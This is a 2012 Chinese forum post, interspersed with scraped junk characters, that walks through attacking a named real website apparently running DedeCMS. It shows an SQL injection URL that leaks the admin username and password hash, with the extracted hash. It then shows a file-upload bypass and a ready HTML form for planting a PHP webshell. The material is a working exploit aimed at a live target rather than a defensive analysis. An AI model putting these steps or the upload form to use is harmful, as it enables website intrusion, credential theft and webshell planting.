①注入漏洞。
6 b9 t! y9 \$ ?+ z* |这站 http://www.political-security.com/
2 t1 v/ [5 }& m" a5 d6 F首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,
! L$ {% p% \4 z/ Y1 M/ \, q" G5 Zwww.political-security.com/data/mysql_error_trace.inc 爆后台
4 S' W5 ?0 l |4 e. d然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。% @3 h2 Y( @( `/ c6 P
然后写上语句 % d, m1 c' q. l6 O- E
查看管理员帐号
+ {5 y* E8 c+ b2 ~& mhttp://www.political-security.co ... &membergroup=@`
7 |; K: t0 ?- {+ c5 b; A7 x9 |! y% ]( L0 I; t/ f4 i5 L
admin
7 C O! {! B! `$ B7 B. C
/ T6 g' q* Q9 g* b6 ]2 N4 n查看管理员密码& Z) H% m# x$ `# t: A; F
http://www.political-security.co ... &membergroup=@`
. n) I! K3 F1 K# E' H* M$ K$ J1 I% I) l& {6 V
8d29b1ef9f8c5a5af429
/ c/ W4 _! I- r0 L8 Y' _' b: S# X
查看管理员密码( R1 Y8 E0 H" t5 g
$ I- H8 u: {3 b' @: l5 }得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5
; h5 `4 l! j. N$ _* y0 J
4 y2 h2 j; D z* _' D( {8d27 P6 g) Q. v( b F. d _
9b1ef9f8c5a5af42
1 L) T: F/ y6 y: W9 K9
" o2 H7 c! q: E Y4 C% f; _6 g+ V& D1 v: Z7 p2 o$ ~
cmd5没解出来 只好测试第二个方法
, y9 D( A3 g+ L$ q) z) E+ j" g
/ u% ` e# }" Z. N) S( Z) I% n
/ |' _, l' I# {+ V3 E' ^* l②上传漏洞:
9 t; P; Z R& A8 n- B5 r, Q
' g }7 A4 i/ n0 S( o只要登陆会员中心,然后访问页面链接
* e" }0 s$ v% w: l“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”' ^0 I6 y6 A# h, Q8 ?2 Z
0 H$ e4 g% J1 _. | }
如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”
) S6 W* j6 s( J+ I" m/ c4 `( v
2 F1 g* n* T, `- M于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm
4 C2 L) j0 J0 _) j( I% ?3 o! Q6 k, y/ p6 u g+ j
<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>
d- `% \0 E8 S- s或者( w7 q5 d' \' x2 K# W+ R
即可上传成功 |
发表于 2012-9-13 10:56:59
收藏
分享
支持
反对